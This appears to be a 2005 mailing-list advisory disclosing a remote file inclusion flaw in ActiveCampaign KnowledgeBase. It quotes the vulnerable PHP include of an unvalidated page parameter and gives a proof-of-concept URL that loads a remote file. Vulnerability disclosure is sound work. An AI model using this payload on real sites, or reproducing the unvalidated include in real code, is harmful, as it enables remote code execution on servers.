Date: 12 Mar 2005 12:15:47 -0000
From: Francisco Alisson <dominusvis@click21.com.br.>
To: [email protected]Subject: KnowledgeBase
X-Virus-Scanned: antivirus-gw at tyumen.ru
Remote File Inclusion
KnowledgeBase
Vendor: www.activecampaign.com/kb/
Well, inside the index.php file we can see:
if ($page == ""){
$page = "startup";
}
@include("$page.php");
?>
After I tested some sites with kb I got file inclusion:
http://www.site.com/kb/index.php?page=http://[file]
Dominus_Vis
[Infektion Group]
